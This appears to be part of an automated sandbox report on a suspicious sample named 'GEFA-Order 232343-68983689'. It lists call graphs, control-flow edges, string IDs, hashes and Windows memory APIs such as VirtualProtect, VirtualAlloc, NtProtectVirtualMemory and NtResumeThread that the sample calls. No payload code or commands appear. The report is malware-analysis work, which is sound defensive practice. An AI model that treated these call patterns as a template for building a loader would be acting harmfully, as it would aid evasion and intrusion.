65347->65348 65355 6ee5349 65348->65355 65352 6ee5278 65351->65352 65354 6ee5349 2 API calls 65352->65354 65353 6ee52a3 65353->65344 65354->65353 65357 6ee5368 65355->65357 65356 6ee52a3 65356->65344 65357->65356 65358 6ee3758 VirtualProtect 65357->65358 65359 6ee3760 VirtualProtect 65357->65359 65358->65357 65359->65357 64665 6f16d61 64666 6f16d6b 64665->64666 64670 6d79d49 64666->64670 64679 6d79d58 64666->64679 64667 6f16cc2 64671 6d79d58 64670->64671 64688 6d7a313 64671->64688 64693 6d79d88 64671->64693 64698 6d79d98 64671->64698 64703 6d79e2a 64671->64703 64708 6d7a2af 64671->64708 64713 6d7a2df 64671->64713 64672 6d79d83 64672->64667 64680 6d79d6d 64679->64680 64682 6d7a313 2 API calls 64680->64682 64683 6d7a2df 2 API calls 64680->64683 64684 6d7a2af 2 API calls 64680->64684 64685 6d79e2a 2 API calls 64680->64685 64686 6d79d98 2 API calls 64680->64686 64687 6d79d88 2 API calls 64680->64687 64681 6d79d83 64681->64667 64682->64681 64683->64681 64684->64681 64685->64681 64686->64681 64687->64681 64689 6d79e14 64688->64689 64690 6d7a1df 64689->64690 64691 6ee3758 VirtualProtect 64689->64691 64692 6ee3760 VirtualProtect 64689->64692 64690->64672 64691->64689 64692->64689 64695 6d79d98 64693->64695 64694 6d7a1df 64694->64672 64695->64694 64696 6ee3758 VirtualProtect 64695->64696 64697 6ee3760 VirtualProtect 64695->64697 64696->64695 64697->64695 64699 6d79dc2 64698->64699 64700 6d7a1df 64699->64700 64701 6ee3758 VirtualProtect 64699->64701 64702 6ee3760 VirtualProtect 64699->64702 64700->64672 64701->64699 64702->64699 64705 6d79e14 64703->64705 64704 6d7a1df 64704->64672 64705->64703 64705->64704 64706 6ee3758 VirtualProtect 64705->64706 64707 6ee3760 VirtualProtect 64705->64707 64706->64705 64707->64705 64710 6d79e14 64708->64710 64709 6d7a1df 64709->64672 64710->64709 64711 6ee3758 VirtualProtect 64710->64711 64712 6ee3760 VirtualProtect 64710->64712 64711->64710 64712->64710 64714 6d7a1df 64713->64714 64715 6d79e14 64713->64715 64714->64672 64715->64714 64716 6ee3758 VirtualProtect 64715->64716 64717 6ee3760 VirtualProtect 64715->64717 64716->64715 64717->64715 65360 192ca40 65361 192ca86 GetCurrentProcess 65360->65361 65363 192cad1 65361->65363 65364 192cad8 GetCurrentThread 65361->65364 65363->65364 65365 192cb15 GetCurrentProcess 65364->65365 65366 192cb0e 65364->65366 65367 192cb4b 65365->65367 65366->65365 65368 192cb73 GetCurrentThreadId 65367->65368 65369 192cba4 65368->65369 64718 6f5836e 64719 6f5838d 64718->64719 64722 6f5d1d0 64719->64722 64723 6f5d1f7 64722->64723 64726 6f5d620 64723->64726 64727 6f5d668 VirtualProtect 64726->64727 64729 6f501e5 64727->64729 64730 184d118 64731 184d130 64730->64731 64732 184d18b 64731->64732 64734 6f5dc88 64731->64734 64735 6f5dcb0 64734->64735 64738 6f5e148 64735->64738 64736 6f5dcd7 64739 6f5e175 64738->64739 64740 6f5d1d0 VirtualProtect 64739->64740 64742 6f5e30b 64739->64742 64741 6f5e2fc 64740->64741 64741->64736 64742->64736 65370 6ee2430 65371 6ee247e NtProtectVirtualMemory 65370->65371 65373 6ee24c8 65371->65373 64743 6f5556a 64746 6f5e540 64743->64746 64747 6f5e555 64746->64747 64750 6f5e590 64747->64750 64752 6f5e5b7 64750->64752 64754 6f5e698 64752->64754 64755 6f5e6d8 VirtualAlloc 64754->64755 64757 6f501e5 64755->64757
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                          • API String ID: 0-312445597
                                          • Opcode ID: d106c3852bfb77327d601343c08efa121ae02339851c501f4f5dd17ce219e0a2
                                          • Instruction ID: 35ea993d81b7be2900c0c57edb703f11a946decb8104d99faed275d1f261739e
                                          • Opcode Fuzzy Hash: d106c3852bfb77327d601343c08efa121ae02339851c501f4f5dd17ce219e0a2
                                          • Instruction Fuzzy Hash: DDB20534E402288FDB54CFA8C894BADB7B6BF88740F158599E505AB3A5DB74EC81CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                          • API String ID: 0-2546334966
                                          • Opcode ID: 29ac67313d6a0ea35e50f377e1ad81662be2cecf64f7dc7b476946ce68f11a3c
                                          • Instruction ID: 8e23f4a6c64e73b0440a92d3888bbe026ac78b0c0087b5369a3d388e4dfb0d7c
                                          • Opcode Fuzzy Hash: 29ac67313d6a0ea35e50f377e1ad81662be2cecf64f7dc7b476946ce68f11a3c
                                          • Instruction Fuzzy Hash: B622E534E40219CFDB64CF68C894BA9B7B6BF88744F1481A9E509AB3A5DB34DD81CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1856 6d7f370-6d7f391 1857 6d7f393 1856->1857 1858 6d7f398-6d7f430 call 6d7fca0 1856->1858 1857->1858 1862 6d7f436-6d7f46d 1858->1862 1864 6d7f46f-6d7f47a 1862->1864 1865 6d7f47c 1862->1865 1866 6d7f486-6d7f558 1864->1866 1865->1866 1875 6d7f56a-6d7f595 1866->1875 1876 6d7f55a-6d7f560 1866->1876 1877 6d7fc08-6d7fc24 1875->1877 1876->1875 1878 6d7f59a-6d7f6c3 1877->1878 1879 6d7fc2a-6d7fc45 1877->1879 1888 6d7f6d5-6d7f82a 1878->1888 1889 6d7f6c5-6d7f6cb 1878->1889 1897 6d7f883-6d7f88a 1888->1897 1898 6d7f82c-6d7f830 1888->1898 1889->1888 1901 6d7fa35-6d7fa51 1897->1901 1899 6d7f832-6d7f833 1898->1899 1900 6d7f838-6d7f87e 1898->1900 1902 6d7fac5-6d7fb14 1899->1902 1900->1902 1903 6d7fa57-6d7fa7b 1901->1903 1904 6d7f88f-6d7f97d 1901->1904 1918 6d7fb26-6d7fb71 1902->1918 1919 6d7fb16-6d7fb1c 1902->1919 1909 6d7fac2-6d7fac3 1903->1909 1910 6d7fa7d-6d7fabf 1903->1910 1928 6d7f983-6d7fa2e 1904->1928 1929 6d7fa31-6d7fa32 1904->1929 1909->1902 1910->1909 1920 6d7fb73-6d7fbe9 1918->1920 1921 6d7fbea-6d7fc05 1918->1921 1919->1918 1920->1921 1921->1877 1928->1929 1929->1901
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fcq$8
                                          • API String ID: 0-89531850
                                          • Opcode ID: 550e0a34a4b8366f77553a197eeba178adee8692c9d6db6394269eb12a9d0f98
                                          • Instruction ID: 697c850b1b23a7f35a11eca2521eb617b04d636fde78acda9039da198d771bc0
                                          • Opcode Fuzzy Hash: 550e0a34a4b8366f77553a197eeba178adee8692c9d6db6394269eb12a9d0f98
                                          • Instruction Fuzzy Hash: 1842C275D006298FDB64DF69C854AD9B7B2BF89300F1486EAD40DA7351EB30AE85CF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2361 6d7f360-6d7f391 2363 6d7f393 2361->2363 2364 6d7f398-6d7f430 call 6d7fca0 2361->2364 2363->2364 2368 6d7f436-6d7f46d 2364->2368 2370 6d7f46f-6d7f47a 2368->2370 2371 6d7f47c 2368->2371 2372 6d7f486-6d7f558 2370->2372 2371->2372 2381 6d7f56a-6d7f595 2372->2381 2382 6d7f55a-6d7f560 2372->2382 2383 6d7fc08-6d7fc24 2381->2383 2382->2381 2384 6d7f59a-6d7f6c3 2383->2384 2385 6d7fc2a-6d7fc45 2383->2385 2394 6d7f6d5-6d7f82a 2384->2394 2395 6d7f6c5-6d7f6cb 2384->2395 2403 6d7f883-6d7f88a 2394->2403 2404 6d7f82c-6d7f830 2394->2404 2395->2394 2407 6d7fa35-6d7fa51 2403->2407 2405 6d7f832-6d7f833 2404->2405 2406 6d7f838-6d7f87e 2404->2406 2408 6d7fac5-6d7fb14 2405->2408 2406->2408 2409 6d7fa57-6d7fa7b 2407->2409 2410 6d7f88f-6d7f97d 2407->2410 2424 6d7fb26-6d7fb71 2408->2424 2425 6d7fb16-6d7fb1c 2408->2425 2415 6d7fac2-6d7fac3 2409->2415 2416 6d7fa7d-6d7fabf 2409->2416 2434 6d7f983-6d7fa2e 2410->2434 2435 6d7fa31-6d7fa32 2410->2435 2415->2408 2416->2415 2426 6d7fb73-6d7fbe9 2424->2426 2427 6d7fbea-6d7fc05 2424->2427 2425->2424 2426->2427 2427->2383 2434->2435 2435->2407
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fcq$h
                                          • API String ID: 0-1849521214
                                          • Opcode ID: c4240f051d6e71f42a3af6fef608c5ec9f1732a0db3a94f85ee1345b1c989238
                                          • Instruction ID: 660bd96a53853863efe2a1631234d0a2e14a855eae19bd4564c6c41b8cc89e3e
                                          • Opcode Fuzzy Hash: c4240f051d6e71f42a3af6fef608c5ec9f1732a0db3a94f85ee1345b1c989238
                                          • Instruction Fuzzy Hash: 9261E471D006298FEB64DF6ACC547D9BBB2BF89300F54C2AAC44DA7250EB305A85CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2
                                          • API String ID: 0-450215437
                                          • Opcode ID: 7db4428fe91a5f0fd92a0eaabc8515ec872f0026df866067cb4ccc8a5bc849bf
                                          • Instruction ID: 282f1feb40a60ead33a3e9d8409812cfc2285d31986a44a2d536df782eff265c
                                          • Opcode Fuzzy Hash: 7db4428fe91a5f0fd92a0eaabc8515ec872f0026df866067cb4ccc8a5bc849bf
                                          • Instruction Fuzzy Hash: 19C2A0B4E00228CFDB65DF69D884B99BBB6FB89300F1081E9D509AB355DB309E85CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: e57c556fe160147c58d61e0877cc3954fb624e0aa3686c2b35038ed5b82f0317
                                          • Instruction ID: 49dac6ac246ce92d146e43909614d9789c1830107a36d7fb87f7af2f26bf8163
                                          • Opcode Fuzzy Hash: e57c556fe160147c58d61e0877cc3954fb624e0aa3686c2b35038ed5b82f0317
                                          • Instruction Fuzzy Hash: 11F10574E05218CFEBA4CF69D994BA9BBF2FB49380F1084AAD41DAB255DB705D84CF10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 6d02af1c1734ab760716dab88356b7d11b67f242ac6e3a54da9fc6474adf13e2
                                          • Instruction ID: fae897a29fecc9c7f34c11370a87c1f1a6954d1991d40fce279fa5ff62fbb758
                                          • Opcode Fuzzy Hash: 6d02af1c1734ab760716dab88356b7d11b67f242ac6e3a54da9fc6474adf13e2
                                          • Instruction Fuzzy Hash: E6F1F674E05218CFEBA4CF69D984B99BBF2FB49380F1081AAD41DAB255DB705D84CF10
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06EE24B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: e51a5053a6adfc4da2a1b259c8fb36c0ed9d0d52c2de3141641edd74f02b48ce
                                          • Instruction ID: 66653a0c634338dede7b8d9056212a6f4616d5125b64c5a037700e5edba2d8be
                                          • Opcode Fuzzy Hash: e51a5053a6adfc4da2a1b259c8fb36c0ed9d0d52c2de3141641edd74f02b48ce
                                          • Instruction Fuzzy Hash: F32102B1D013499FCB10DFAAD984A9EFBF5FF48310F20842EE559A7240C7759A41CBA5
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06EE24B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 365fe2b26435ddb9d337d6d593b67f0a03db15274ae9fdeb5151bb0401d681ba
                                          • Instruction ID: 241ddfb25b2df147ece0e1fc6c526314b1f85dfe5fdf649aff768e9af04dd35d
                                          • Opcode Fuzzy Hash: 365fe2b26435ddb9d337d6d593b67f0a03db15274ae9fdeb5151bb0401d681ba
                                          • Instruction Fuzzy Hash: 582103B1D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A3240D775A901CBA0
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06EE358E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: e2e31e3e917123abe2289d2eae86ad7706d7fef9be8789cad9034591ad87520e
                                          • Instruction ID: 63f40bdc1e79c732edd3ab68c783053fe68604d99a630d1ee2a6e7ae4e0df7b6
                                          • Opcode Fuzzy Hash: e2e31e3e917123abe2289d2eae86ad7706d7fef9be8789cad9034591ad87520e
                                          • Instruction Fuzzy Hash: AD21E3B19003498FCB10DFAAC4456AEFBF4EF88324F14842AD459A7240DB74A945CFA5
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06EE358E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 07842053262da182da0bdf05855be056a841e8ddd086a85e108501d66449c9d3
                                          • Instruction ID: 84ad907a7dd0d9fa55452e3024a4ae347f4ffad351648b4282122681680da2f6
                                          • Opcode Fuzzy Hash: 07842053262da182da0bdf05855be056a841e8ddd086a85e108501d66449c9d3
                                          • Instruction Fuzzy Hash: BA11D6B1D003498EDB10DFAAC44569FFBF5EF88324F10842AD419A7240DB74A945CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Deq
                                          • API String ID: 0-948982800
                                          • Opcode ID: 15538f127c9ee83fcd65a1476ec0c8d0b3d2a8186ae0549199e900c4016a488c
                                          • Instruction ID: 6c2c2f61ae9e7945d2f5a465f0a9082411585407cc071ca73cb65b048dde67fb
                                          • Opcode Fuzzy Hash: 15538f127c9ee83fcd65a1476ec0c8d0b3d2a8186ae0549199e900c4016a488c
                                          • Instruction Fuzzy Hash: F4D1D474E00219CFDB54DFA9E994A9DBBB2FF88304F1081A9D409AB365DB34AD81CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: e6fbe1b6448a712bbc1b1bbe15b77c8a7ff5d775f2103e599d946765412a8af0
                                          • Instruction ID: 580bdc62d479e07fc91d9e829140ba16a7874df802fbbe4ad6f76653f2e0b7e0
                                          • Opcode Fuzzy Hash: e6fbe1b6448a712bbc1b1bbe15b77c8a7ff5d775f2103e599d946765412a8af0
                                          • Instruction Fuzzy Hash: C0C13A74E01218DFEB94CFA9D948BADBBF2FF49305F1480A9D449AB241EB745984CF02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: b29d9a54530b72a3f93f07bfb14c75bbf8e1d4d32cb3f554eea73b4724c60152
                                          • Instruction ID: 1a2983bca54952e66174f7fb9438a580572db1bfeec7d5f8dc8d65ef814f1eaf
                                          • Opcode Fuzzy Hash: b29d9a54530b72a3f93f07bfb14c75bbf8e1d4d32cb3f554eea73b4724c60152
                                          • Instruction Fuzzy Hash: 36C13974E01218CFEBA4CFA9D948BADBBF2FF45301F1480A9D449AB251EB745985CF02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 805c515e170498f0c1ce52311b6f4fafcb22b13b1255180508802800b207075d
                                          • Instruction ID: 4594ca7b13832390ae81254e608cd2d2ed51ee90d5746993e5515b7851915cc3
                                          • Opcode Fuzzy Hash: 805c515e170498f0c1ce52311b6f4fafcb22b13b1255180508802800b207075d
                                          • Instruction Fuzzy Hash: 9BA1E774E05618CFDF94CFA9D984BADBBB2FF89304F20906AD40AA7241DB345985CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 974a0ac743ab866d5a950a6cf1adc9ba9eb64e5d0354ff401491f74c2a2c9074
                                          • Instruction ID: 376177e9f56ff9b95eb8c440d48992653a0e2f2798d0125c109660c77284cd56
                                          • Opcode Fuzzy Hash: 974a0ac743ab866d5a950a6cf1adc9ba9eb64e5d0354ff401491f74c2a2c9074
                                          • Instruction Fuzzy Hash: AA329574A0422A8FCBA5DF28C994BA9B7B6FF48301F1481E9D54DA7351DB30AE81CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4dea54c342116ff206bd139841ee51a17954987e588adc9f6ceae9e95db3c09d
                                          • Instruction ID: 391023790614d6421f614a6d16d9651927b3c1a01731996a34427b18489f8140
                                          • Opcode Fuzzy Hash: 4dea54c342116ff206bd139841ee51a17954987e588adc9f6ceae9e95db3c09d
                                          • Instruction Fuzzy Hash: E8E10474E15218DFEFA4CF69D984BADBBF2BB49304F1080A9D049AB351DB749984CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aaf2901465a4ee56867f127ab89bc1bdbf0d9a1c1f266ece9dee574c63daf888
                                          • Instruction ID: ade3c9514fae757bf82759b0998aeef8f9dad7e79b7145500d2df1b910614585
                                          • Opcode Fuzzy Hash: aaf2901465a4ee56867f127ab89bc1bdbf0d9a1c1f266ece9dee574c63daf888
                                          • Instruction Fuzzy Hash: 56D11470E11218DFEFA4CF69D984BADBBF2FB49304F1084A9D149AB251DB748985CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f058ab680a1201d2401c7c6498374a962524267ba32f38ac0d8777a14a9b9dd
                                          • Instruction ID: 8de4f6a7c9ead5f02423b354cd08f707e263b3138b578bab190cd42a705c4efd
                                          • Opcode Fuzzy Hash: 2f058ab680a1201d2401c7c6498374a962524267ba32f38ac0d8777a14a9b9dd
                                          • Instruction Fuzzy Hash: 2BD10474E11218DFEFA4CF69D984BADBBF2BB49304F1080A9D109AB251DB749985CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4996fac02d732ac90158768b1c2894e28db240580a9c7c3d70fc52a0d037d41a
                                          • Instruction ID: 898b0859cf05ea3801d2f8296df9c56e24987f5b0ca11cb464b415395d1ef648
                                          • Opcode Fuzzy Hash: 4996fac02d732ac90158768b1c2894e28db240580a9c7c3d70fc52a0d037d41a
                                          • Instruction Fuzzy Hash: ABC11370E15218DFEFA4CF69D984BADBBF2BF49304F1080A9D049AB251DB749985CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45f335f90d7f1f065ff0cf64dd0fc2f117a4bbb35ea30f2864f956a1b0d7ee61
                                          • Instruction ID: f5f288bc88f6d454640d68b42a041ee3ff4c8611f867052441d601ce5828f166
                                          • Opcode Fuzzy Hash: 45f335f90d7f1f065ff0cf64dd0fc2f117a4bbb35ea30f2864f956a1b0d7ee61
                                          • Instruction Fuzzy Hash: BDC1F974E05218CFEB54DF69D894BADBBB2FB89304F1080A9D509AB390DB349D85CF52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51716e81884f5c47e990a802a9d11d81af9ea4ed3a35e0b63f56a82d9692fb65
                                          • Instruction ID: e5b51790552405e6e3222c9c6e5bbc69120080fd819ab5cba6bc5c12a73e4e99
                                          • Opcode Fuzzy Hash: 51716e81884f5c47e990a802a9d11d81af9ea4ed3a35e0b63f56a82d9692fb65
                                          • Instruction Fuzzy Hash: 20512AB1E016588FEB19CF6BD84469ABBF3AFC9300F14C0BAD548AB255DB340981CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 360c3631dc31dce5fe666918b34eb9c48d1215c3cb7a7d79a6daf978b4d50dc2
                                          • Instruction ID: 332e98a8fafb017fe89f04277e4492636b466d959f10a362bc00104c3cdcb6eb
                                          • Opcode Fuzzy Hash: 360c3631dc31dce5fe666918b34eb9c48d1215c3cb7a7d79a6daf978b4d50dc2
                                          • Instruction Fuzzy Hash: 07516574E05208CFDB94DFA8E4487EDBBB2FB99300F14903AD055AB244E7388945DB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c24358bf12f93b3d9d0337cce337b4b88acfe1c434eaf09a341978fbf914ab3
                                          • Instruction ID: ad46621039b22b4419d6146adeef362cc382c0c5a66a8298d9181d06bc3be8fa
                                          • Opcode Fuzzy Hash: 8c24358bf12f93b3d9d0337cce337b4b88acfe1c434eaf09a341978fbf914ab3
                                          • Instruction Fuzzy Hash: 13416874E05218CFDB90DFA8E4487EDBBB6FB89300F14903AD059A7244E7788945DB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd28867dbe1651cee9568fef195c07cfe8c419223d88fed3d5d1c449f65e998c
                                          • Instruction ID: 79975621f340045663460b7a214eaacebf5ee791c38e8e8f20b54dd1b78a83df
                                          • Opcode Fuzzy Hash: dd28867dbe1651cee9568fef195c07cfe8c419223d88fed3d5d1c449f65e998c
                                          • Instruction Fuzzy Hash: 39312B71D05658DFDB68CF6BD9442DDBBF3AFC9301F14C1AAD409AA225DA304A46CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1221 192ca32-192cacf GetCurrentProcess 1226 192cad1-192cad7 1221->1226 1227 192cad8-192cb0c GetCurrentThread 1221->1227 1226->1227 1228 192cb15-192cb49 GetCurrentProcess 1227->1228 1229 192cb0e-192cb14 1227->1229 1231 192cb52-192cb6d call 192d01a 1228->1231 1232 192cb4b-192cb51 1228->1232 1229->1228 1234 192cb73-192cba2 GetCurrentThreadId 1231->1234 1232->1231 1236 192cba4-192cbaa 1234->1236 1237 192cbab-192cc0d 1234->1237 1236->1237
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0192CABE
                                          • GetCurrentThread.KERNEL32 ref: 0192CAFB
                                          • GetCurrentProcess.KERNEL32 ref: 0192CB38
                                          • GetCurrentThreadId.KERNEL32 ref: 0192CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: c5dffaf94a283575ea5e9b7ec279dbae6d3d6437f71f7af162eeb4b9b8639950
